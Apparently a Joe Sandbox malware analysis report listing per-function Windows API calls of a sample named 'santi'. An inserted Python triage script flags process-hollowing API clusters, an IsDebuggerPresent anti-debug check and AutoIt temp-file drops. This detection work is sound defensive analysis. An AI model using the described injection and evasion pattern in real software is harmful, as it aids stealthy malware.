                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: Control Panel\Mouse
                                                                • API String ID: 3677997916-824357125
                                                                • Opcode ID: 0020b4aca23e272ed2c0edc957300839ef51736be0f820596e722f8f6f390b61
                                                                • Instruction ID: ba67a02bd6eb8a3cf3f13403887f57a2d6c960ea21d93822d765718803fcff98
                                                                • Opcode Fuzzy Hash: 0020b4aca23e272ed2c0edc957300839ef51736be0f820596e722f8f6f390b61
                                                                • Instruction Fuzzy Hash: 06115A75A2120DBFEB118F64CC84EBEBBBDEF04784F008469EA01D7120D7719E509B64
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00E169CB
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E16A61
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E16A83
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                • Instruction ID: 84d280ed681f6c6351d1768c986813fd4179b1d06eedb73a3fb88869c936dbce
                                                                • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                • Instruction Fuzzy Hash: B562FA30A146589BEB24DFA4C850BDEB376EF58304F1091A9D10DFB390E7769E81CB5A
                                                                APIs
                                                                  • Part of subcall function 002E4517: _fseek.LIBCMT ref: 002E452F
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C65D
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C670
                                                                • _free.LIBCMT ref: 0032C4DD
                                                                • _free.LIBCMT ref: 0032C4E4
                                                                • _free.LIBCMT ref: 0032C54F
                                                                  • Part of subcall function 00301C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00307A85), ref: 00301CB1
                                                                  • Part of subcall function 00301C9D: GetLastError.KERNEL32(00000000,?,00307A85), ref: 00301CC3
                                                                • _free.LIBCMT ref: 0032C557
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                • String ID:
                                                                • API String ID: 1552873950-0
                                                                • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                • Instruction ID: 41d59885d7cf1c730486c343bc42b3595294a298dadd72548541916a43a8febc
                                                                • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                • Instruction Fuzzy Hash: A75162B1914258AFDF15EF65DC81BAEBBB9EF48300F10009EF219A7281DB715A90CF59
                                                                APIs
                                                                • _memset.LIBCMT ref: 002FEBB2
                                                                  • Part of subcall function 002E51AF: _memset.LIBCMT ref: 002E522F
                                                                  • Part of subcall function 002E51AF: _wcscpy.LIBCMT ref: 002E5283
                                                                  • Part of subcall function 002E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5293
                                                                • KillTimer.USER32(?,00000001,?,?), ref: 002FEC07
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002FEC16
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00353C88
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                • String ID:
                                                                • API String ID: 1378193009-0
                                                                • Opcode ID: b0886b5b0422ce4dbd51c0ba79ec8c33fa08a410c9310398a871ba2b5c79e29d
                                                                • Instruction ID: 18aa2652554d4fc367dc0f6f9d09c813f61ab2556f75fa0ab6d2e27d7cf50498
                                                                • Opcode Fuzzy Hash: b0886b5b0422ce4dbd51c0ba79ec8c33fa08a410c9310398a871ba2b5c79e29d
                                                                • Instruction Fuzzy Hash: 9E2129709047849FEB338B28C859FE7FBEC9B05748F05009EE78E56291C7B42A88CB51
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0032C72F
                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0032C746
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Temp$FileNamePath
                                                                • String ID: aut
                                                                • API String ID: 3285503233-3010740371
                                                                • Opcode ID: ebc265cb0aa309d06216e5fd33def1af1171de5247ad2f1bba4d8ffe12792284
                                                                • Instruction ID: 579c5eb13308d519c3727e2d56f7882a17cd32e558fb3cf554d44ae16f7142ac
                                                                • Opcode Fuzzy Hash: ebc265cb0aa309d06216e5fd33def1af1171de5247ad2f1bba4d8ffe12792284
                                                                • Instruction Fuzzy Hash: DFD05E71A0030EABDB11AB90DC0EFCA776C9704704F0045A0B650E50B1DBF1E6998B54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 692c465dbb015c9b4aa9eac2ec6c04e3956a57c17b2f1df838294a3d75805565
                                                                • Instruction ID: 4a0783fca8b8ec2c0f300a26e95ba0894027e9c6fed68088f4758e83026fa06e
                                                                • Opcode Fuzzy Hash: 692c465dbb015c9b4aa9eac2ec6c04e3956a57c17b2f1df838294a3d75805565
                                                                • Instruction Fuzzy Hash: 89F16971A083019FCB11DF24C585B6AF7E5BF88314F50892EF9999B292D770E905CF82
                                                                APIs
                                                                • __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 003081C2: __NMSG_WRITE.LIBCMT ref: 003081E9
                                                                  • Part of subcall function 003081C2: __NMSG_WRITE.LIBCMT ref: 003081F3
                                                                • __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030821F: GetModuleFileNameW.KERNEL32(00000000,003A0312,00000104,00000000,00000001,00000000), ref: 003082B1
                                                                  • Part of subcall function 0030821F: ___crtMessageBoxW.LIBCMT ref: 0030835F
                                                                  • Part of subcall function 00301145: ___crtCorExitProcess.LIBCMT ref: 0030114B
                                                                  • Part of subcall function 00301145: ExitProcess.KERNEL32 ref: 00301154
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 1372826849-0
                                                                • Opcode ID: 7311cfad74198497857319c979f583626cd1915282d8262370d6da81bd97045c
                                                                • Instruction ID: 6a3a245d6c74c458bceabfdf6f88f303470c8860fc32322010e6337af44ea560
                                                                • Opcode Fuzzy Hash: 7311cfad74198497857319c979f583626cd1915282d8262370d6da81bd97045c
                                                                • Instruction Fuzzy Hash: 8301B5353472019AE6277B39EC72B2A335C9F82760F22002AF5059F5D2DFF0DD0086A1
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0032C385,?,?,?,?,?,00000004), ref: 0032C6F2
                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0032C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0032C708
                                                                • CloseHandle.KERNEL32(00000000,?,0032C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0032C70F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                • Opcode ID: 4ad94b720538060abc289d7250a93aff1830b6473b16d774b0e9849e8f937dba
                                                                • Instruction ID: 4b56e263b0f1c5065f0c74c5c989f7b47e10034ea01c47864f79a82b01108c65
                                                                • Opcode Fuzzy Hash: 4ad94b720538060abc289d7250a93aff1830b6473b16d774b0e9849e8f937dba
                                                                • Instruction Fuzzy Hash: 9DE08632640224BBD7221B54AC0AFCE7B1CAB06B60F108110FB54690E097F125118798
                                                                APIs
                                                                • _free.LIBCMT ref: 0032BB72
                                                                  • Part of subcall function 00301C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00307A85), ref: 00301CB1
                                                                  • Part of subcall function 00301C9D: GetLastError.KERNEL32(00000000,?,00307A85), ref: 00301CC3
                                                                • _free.LIBCMT ref: 0032BB83
                                                                • _free.LIBCMT ref: 0032BB95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                • Instruction ID: 76aa0d6ef71404af82ff5dd53f0609adeb9f9f4f9aef31dde00441cfbbd513d7
                                                                • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                • Instruction Fuzzy Hash: C2E012B164275147EA25A5B97E5CEB353CC4F04351715081DB55AEB186CF24F84089A4
                                                                APIs
                                                                  • Part of subcall function 002E22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002E24F1), ref: 002E2303
                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002E25A1
                                                                • CoInitialize.OLE32(00000000), ref: 002E2618
                                                                • CloseHandle.KERNEL32(00000000), ref: 0035503A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                • String ID:
                                                                • API String ID: 3815369404-0
                                                                • Opcode ID: 7ceb8543bc64ad5d551101c7c894aa3fd4567ebf9c69625b10666ec3a81e8041
                                                                • Instruction ID: 3693f6efe953ac7f10510ec3deaf25a92b527a0fc0f95e844abbce5341b6bfb1
                                                                • Opcode Fuzzy Hash: 7ceb8543bc64ad5d551101c7c894aa3fd4567ebf9c69625b10666ec3a81e8041
                                                                • Instruction Fuzzy Hash: 8B71AFB89112918AC717EF5BA990695BBACFB9B380F804A2ED11AC77B1CB748414CF14
                                                                APIs
                                                                • IsThemeActive.UXTHEME ref: 002E3A73
                                                                  • Part of subcall function 00301405: __lock.LIBCMT ref: 0030140B
                                                                  • Part of subcall function 002E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002E3AF3
                                                                  • Part of subcall function 002E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E3B08
                                                                  • Part of subcall function 002E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002E3AA3,?), ref: 002E3D45
                                                                  • Part of subcall function 002E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,002E3AA3,?), ref: 002E3D57
                                                                  • Part of subcall function 002E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,003A1148,003A1130,?,?,?,?,002E3AA3,?), ref: 002E3DC8
                                                                  • Part of subcall function 002E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,002E3AA3,?), ref: 002E3E48
                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E3AB3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                • String ID:
                                                                • API String ID: 924797094-0
                                                                • Opcode ID: 607a3504bfe201e4bebdb7ae1ae8668e7d9081732d37855f3da40498e64aefc8
                                                                • Instruction ID: d04b707aeb3e7f19db5a183630714b52297bd1a8bdb06685d0f2e2f49cee2fef
                                                                • Opcode Fuzzy Hash: 607a3504bfe201e4bebdb7ae1ae8668e7d9081732d37855f3da40498e64aefc8
                                                                • Instruction Fuzzy Hash: CF11AC719183409BC302EF6AE80591BFBE8EB96750F01891FF585872B1DB708594CF92
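                                                                 Three of the function listings above are the ones a reverser would triage first: the block whose only printed call is ReadProcessMemory but whose API ID bag also names Context, Thread and Wow64 (a thread-context / read-memory pairing typical of hollowing into a 32-bit child), the block that calls GetTempFileNameW with the prefix "aut" (so anything it extracts lands as %TEMP%\aut*.tmp, the usual footprint of a compiled AutoIt script unpacking its payload), and the block whose subcall performs the IsDebuggerPresent check. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses listings in the "• Api.MODULE(args), ref: ADDR" format shown on this page, including "Part of subcall function" lines and the API ID bag, and flags those three clusters. The indicator sets, the scoring rule and the treatment of the API ID string as a bag of CamelCase words are this example's own heuristics; the sample input is a transcription of lines from the blocks above, trimmed to the fields the parser needs.

```python
"""Triage Joe Sandbox per-function "APIs" listings for injection and
anti-analysis clusters.  Added example; indicator sets and thresholds are
this example's own heuristics, not Joe Sandbox's."""
import re

# Constructed sample input: lines transcribed from three function blocks
# of this report, trimmed to what the parser needs.
SAMPLE = """\
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E16A83
Memory Dump Source
• Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
• API ID: Process$ContextCreateMemoryReadThreadWow64
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0032C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0032C746
Memory Dump Source
• API ID: Temp$FileNamePath
APIs
• IsThemeActive.UXTHEME ref: 002E3A73
  • Part of subcall function 002E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,002E3AA3,?), ref: 002E3D57
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E3AB3
Memory Dump Source
• API ID: InfoParametersSystem$ActiveDebuggerPresentTheme
"""

# One call line: optional "Part of subcall function XXXX:", then Api.MODULE,
# optional "(args)", then "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<bag>\S*)")

# Heuristic indicator sets (this example's choice of APIs).
HOLLOWING = {
    "CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
    "GetThreadContext", "SetThreadContext",
    "Wow64GetThreadContext", "Wow64SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
    "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "ResumeThread",
}
ANTI_DEBUG = {
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
    "OutputDebugStringW", "OutputDebugStringA", "NtQueryInformationProcess",
}


def parse_blocks(text):
    """Split a listing into function blocks, one per "APIs" heading.
    Each block holds 'calls' (api, module, args, ref, subcall) and the
    report's 'api_id' bag ('' when the block has none)."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"calls": [], "api_id": ""}
            blocks.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            current["calls"].append({
                "api": m["api"], "module": m["mod"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"], "subcall": m["sub"],
            })
            continue
        m = API_ID_RE.match(line)
        if m:
            current["api_id"] = m["bag"]
    return blocks


def id_words(bag):
    """Treat the API ID string as a bag of CamelCase words (assumption of
    this example); the '$' separator is ignored."""
    return set(re.findall(r"[A-Z][a-z0-9]*", bag))


def temp_drop_pattern(call):
    """GetTempFileName builds the name from the first three characters of
    its prefix argument, a hex counter and '.tmp'; return that pattern."""
    if call["api"] not in ("GetTempFileNameW", "GetTempFileNameA"):
        return None
    if len(call["args"]) < 2:
        return None
    prefix = call["args"][1].strip()
    if not prefix or prefix == "?":      # prefix not recovered by the plugin
        return None
    return f"%TEMP%\\{prefix[:3]}*.tmp"


def flag_block(block):
    apis = {c["api"] for c in block["calls"]}
    words = id_words(block["api_id"])
    hollow_hits = sorted(apis & HOLLOWING)
    # Two cluster members, or one member plus thread-context words in the
    # API ID bag (the bag names APIs the printed listing omitted).
    hollowing = len(hollow_hits) >= 2 or (
        len(hollow_hits) >= 1 and {"Context", "Thread"} <= words)
    return {
        "hollowing": hollowing, "hollowing_hits": hollow_hits,
        "anti_debug": sorted(apis & ANTI_DEBUG),
        "temp_drops": [p for p in map(temp_drop_pattern, block["calls"]) if p],
        "refs": [c["ref"] for c in block["calls"]],
    }


def triage(text):
    """Return one finding per function block that raised any flag."""
    findings = []
    for i, block in enumerate(parse_blocks(text)):
        f = flag_block(block)
        if f["hollowing"] or f["anti_debug"] or f["temp_drops"]:
            f["block"] = i
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

                                                                 The Wow64 inference is deliberately weak: the listing prints only ReadProcessMemory, and the report's API ID bag cannot distinguish Wow64GetThreadContext from Wow64SetThreadContext, so the block is scored as "hollowing-like" and left for the analyst to confirm against the dump at 00E14000 rather than asserted as proven.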
                                                                APIs
                                                                • ___lock_fhandle.LIBCMT ref: 0030EA29
                                                                • __close_nolock.LIBCMT ref: 0030EA42
                                                                  • Part of subcall function 00307BDA: __getptd_noexit.LIBCMT ref: 00307BDA
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                • String ID:
                                                                • API String ID: 1046115767-0
                                                                • Opcode ID: 94a6691fdad50f336447929f6481e4be5f323e2e0cdca3bf7c886ac6d1b2430b
                                                                • Instruction ID: ac4d166af98a7c3852192eaed39430fa96794d85d835d34f6e70c55a2d3dd0a3
                                                                • Opcode Fuzzy Hash: 94a6691fdad50f336447929f6481e4be5f323e2e0cdca3bf7c886ac6d1b2430b
                                                                • Instruction Fuzzy Hash: 5B11A172B0BA108AE713FF68D8623597A616F86331F264B40E4605F1F2CBB49C409AA1
                                                                APIs
                                                                  • Part of subcall function 0030395C: __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 0030395C: __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030395C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                • std::exception::exception.LIBCMT ref: 002FF51E
                                                                • __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                  • Part of subcall function 00306805: RaiseException.KERNEL32(?,?,0000000E,00396A30,?,?,?,002FF538,0000000E,00396A30,?,00000001), ref: 00306856
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3902256705-0
                                                                • Opcode ID: 8b053fdc7569cf1c5f58b5269928c1ddb49102942837d24dc534b2f06710c48d
                                                                • Instruction ID: dd93c43ec6b76c103da31296d72e9952c4075e59fb2d5a877593c9df68be5ff0
                                                                • Opcode Fuzzy Hash: 8b053fdc7569cf1c5f58b5269928c1ddb49102942837d24dc534b2f06710c48d
                                                                • Instruction Fuzzy Hash: 92F0283150521E67DB02BF98DD129EEB7AC9F00394F648035FA04D61C5CBF0D65086A5
                                                                APIs
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __lock_file.LIBCMT ref: 00303629
                                                                  • Part of subcall function 00304E1C: __lock.LIBCMT ref: 00304E3F
                                                                • __fclose_nolock.LIBCMT ref: 00303634
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
